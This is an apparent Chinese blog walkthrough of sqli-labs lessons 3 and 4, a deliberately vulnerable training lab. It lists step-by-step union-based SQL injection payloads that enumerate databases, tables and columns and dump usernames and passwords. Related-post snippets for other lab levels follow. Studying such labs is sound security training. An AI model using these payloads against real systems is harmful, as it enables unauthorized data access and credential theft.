sqli-labs注入lesson3-4闯关秘籍

·lesson 3

与第一二关不同的是,这一关是基于错误的get单引号变形字符型注入

要使用 ‘) 进行闭合  (ps:博主自己理解为字符型注入,是不过是需要加括号进行闭合,适用于博主自己的方便记忆的法子,仅供参考 )

1.判断是否存在注入

?id=1‘) --+

2.使用order by 猜测字段数

?id=1‘) order by 3 --+

?id=1‘) order by 4 --+

3.确定显示的字段显示位

?id=1‘) and 1=2 union select 1,2,3 --+

4.爆破数据库的版本和数据库名

?id=1‘) and 1=2 union select 1,version(),database() --+

5.查看所有数据库

?id=1‘) and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

6.根据数据库名,爆破出该数据库中的所有表名

?id=1‘) and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),3 --+

7.爆破users表中的列名

?id=1‘) and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3 --+

8.爆破用户名和密码

?id=1‘) and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

·lesson 4

这一关跟第三关有所不同,是基于错误的get双引号变形字符型注入

下面博主就直接写出了爆破用户名密码的语句:

?id=1") and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+

原文地址:https://www.cnblogs.com/Ghost-m/p/12267572.html

时间: 2024-10-28 22:19:03

sqli-labs注入lesson3-4闯关秘籍的相关文章

sql-lib闯关秘籍之11-20关

下面开始11-20关,之前不会的关卡可以参考我这篇文章: sql-lib闯关秘籍之1-10关 不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限! 以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~ 11到21关的提交方式全是post型的,我这里使用burpsuit抓包软件,也可以用hackbar选中的post,下面的实验我们穿插的使用(用hackbar的时候我们的注释符号用#,不用--+,因为--+会出错) 第十一关 从这一关开始,我们就进入到了PO

sql-lib闯关秘籍之21-30关

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关 不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限! 以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~  第二十一关 我们输入用户名密码之后发现是这个样子的,和第20关很像对吧,就是cookie的值变成了一堆字母数字,这是对cookie的值进行了base64的处理,其他和20关一样 获取版本库名(我们只要转码就可以了)

sql-lib闯关秘籍之41-50关

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关,sql-lib闯关秘籍之21-30关,sql-lib闯关秘籍之41-50关 不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限! 以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~ 第四十一关 这关和第三十九关一样,只是错误没有回显 获得版本和数据库名   ?id=0 union select 1,version(),d

sql-lib闯关秘籍之61-65关

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关,sql-lib闯关秘籍之21-30关,sql-lib闯关秘籍之31-40关 ,sql-lib闯关秘籍之41-50关 ,sql-lib闯关秘籍之51-60关 不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限! 以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~ 马上就要结束了,亲爱的,兴奋吗!!!!!!!! 第六十一关

sql-lib闯关秘籍之31-40关

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关,sql-lib闯关秘籍之21-30关 不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限! 以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~ sql-lib闯关秘籍之1-10关 [Sql-lib chuǎngguān mìjí zhī 1-10 guān] sql-lib checkpoints Cheats 1-10

sql-lib闯关秘籍之1-10关

首先尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中,lucky的是limit 3,1的时候查到了password列,同样的方法查询username ,又一个lucky,接下来爆破字段的值.以下所有操作建议在虚拟机中进行~ First  you shoud  have  a 文件夹在你电脑上的例如phpstudy的WWW文件夹中 首先进入这里创建数据库,after that ,let‘s  we  go~ 不管是第几关,我们的最终目标是获得用户密码

sqli labs注入记录(Less-1至Less-10)

Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1

网页闯关游戏(riddle webgame)--SQL注入的潘多拉魔盒

前言: 之前编写了一个网页闯关游戏(类似Riddle Game), 除了希望大家能够体验一下我的游戏外. 也愿意分享编写这个网页游戏过程中, 学到的一些知识. web开发初学者往往会忽视一些常见的漏洞, 比如SQL注入攻击, XSS攻击. 本文将简述SQL注入攻击的原理, 并分享下关卡设计, 其在打开潘多拉魔盒的情况下, 又能很好地限制危害. 效果展示: 先打下广告: 网页闯关游戏入口(请狠狠地点击我, ^_^). 本文的想法实施于第十一关--健忘的教授. 很直接的呈现一个登陆对话框, 考验玩家

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://